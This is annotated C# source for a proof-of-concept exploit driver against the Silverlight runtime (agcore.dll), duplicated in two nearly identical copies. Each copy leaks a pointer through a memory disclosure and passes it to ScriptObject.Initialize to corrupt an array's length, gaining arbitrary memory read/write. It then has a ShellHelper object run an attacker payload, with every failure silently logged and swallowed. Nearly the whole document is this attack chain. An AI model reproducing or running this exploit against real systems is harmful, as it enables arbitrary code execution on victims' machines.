// Proof-of-concept driver for the whole chain, as the page itself describes it:
//   1. MemoryDiscl() leaks a pointer value,
//   2. that pointer is handed to ScriptObject.Initialize() via MyObject.Init(),
//      which (per the author's comment) corrupts buf.Length,
//   3. a ShellHelper32/ShellHelper64 object receives `payload` and runs it.
// Every failure is caught and only written to the log via LogAdd(); nothing is rethrown.
// buf, payload, is64, LogAdd, Hex, MemoryDiscl, MyObject and the ShellHelper types are
// all defined elsewhere in the file and are not visible here.
// NOTE(review): the original paste had every statement on one line, so each `//`
// comment swallowed the rest of the method; line breaks are restored here.
void exploit()
{
    try
    {
        LogAdd("------------ START ------------");

        // Obtain the pointer that will be passed to ScriptObject.Initialize().
        // A zero value is treated as a failed disclosure and aborts the run.
        ulong h = MemoryDiscl();
        LogAdd("handle = " + Hex(h));
        if (h == 0)
        {
            throw new Exception("Something is wrong with the memory disclosure");
        }

        // Remember the array length before the corruption so it can be compared
        // afterwards and also passed to Exec() below.
        int oldLen = buf.Length;
        LogAdd("buf.Length = " + Hex(oldLen));

        // Call ScriptObject.Initialize() with the disclosed pointer; the author states
        // this ends in agcore.dll DOM_ReferenceObject(h) and corrupts buf.Length.
        MyObject mo = new MyObject();
        mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

        // Verify the corruption actually happened: an unchanged length means the
        // primitive is not available and the run is aborted.
        int len = buf.Length;
        LogAdd("buf.Length = " + Hex(len));
        if (len == oldLen)
        {
            throw new Exception("Something is wrong with buf.Length");
        }

        // Author's note: buf is now a uint[] whose Length exceeds 0x40000000, which gives
        // arbitrary read/write on 32-bit; that is not always enough on 64-bit, so a
        // different technique (ShellHelper64) is used there to reach full control.
        // `sh` is declared as ShellHelper32, so ShellHelper64 must be assignable to it —
        // presumably a subclass; the declarations are outside this view.
        ShellHelper32 sh;
        if (is64)
        {
            sh = new ShellHelper64();
            sh.SetPayload(payload);
        }
        else
        {
            sh = new ShellHelper32();
            sh.SetPayload(payload);
        }

        // Run the payload; the pre-corruption length is handed to the helper.
        sh.Exec(oldLen);
        LogAdd("------------ END ------------");
    }
    catch (Exception ex)
    {
        // Any failure in the chain is logged and swallowed; the caller never sees it.
        LogAdd("Error: " + ex.ToString());
    }
}
// Second copy of the same driver (differs from the first only in the brace-less
// `throw` statements). Steps, as the page describes them:
//   1. MemoryDiscl() leaks a pointer value,
//   2. the pointer goes to ScriptObject.Initialize() via MyObject.Init(), which the
//      author says corrupts buf.Length,
//   3. a ShellHelper32/ShellHelper64 object receives `payload` and runs it.
// All exceptions are caught and only logged through LogAdd().
// buf, payload, is64, LogAdd, Hex, MemoryDiscl, MyObject and the ShellHelper types are
// defined elsewhere in the file and are not visible here.
// NOTE(review): the original paste had the method on one line, so each `//` comment
// swallowed everything after it; line breaks are restored here.
void exploit()
{
    try
    {
        LogAdd("------------ START ------------");

        // Obtain the pointer for ScriptObject.Initialize(); zero means the disclosure failed.
        ulong h = MemoryDiscl();
        LogAdd("handle = " + Hex(h));
        if (h == 0) throw new Exception("Something is wrong with the memory disclosure");

        // Record the length before corruption, for the check below and for Exec().
        int oldLen = buf.Length;
        LogAdd("buf.Length = " + Hex(oldLen));

        // Call ScriptObject.Initialize() with the disclosed pointer; per the author this
        // reaches agcore.dll DOM_ReferenceObject(h) and corrupts buf.Length.
        MyObject mo = new MyObject();
        mo.Init((IntPtr)h); // call agcore.dll DOM_ReferenceObject(h)

        // Confirm the length actually changed; otherwise abort.
        int len = buf.Length;
        LogAdd("buf.Length = " + Hex(len));
        if (len == oldLen) throw new Exception("Something is wrong with buf.Length");

        // Author's note: buf is now a uint[] with Length > 0x40000000, giving arbitrary
        // read/write on 32-bit; on 64-bit that is not always enough, so ShellHelper64
        // applies a different technique to reach full control.
        // `sh` is typed ShellHelper32, so ShellHelper64 must be assignable to it —
        // presumably a subclass; the declarations are outside this view.
        ShellHelper32 sh;
        if (is64)
        {
            sh = new ShellHelper64();
            sh.SetPayload(payload);
        }
        else
        {
            sh = new ShellHelper32();
            sh.SetPayload(payload);
        }

        // Run the payload; the pre-corruption length is handed to the helper.
        sh.Exec(oldLen);
        LogAdd("------------ END ------------");
    }
    catch (Exception ex)
    {
        // Failures are logged and swallowed; nothing propagates to the caller.
        LogAdd("Error: " + ex.ToString());
    }
}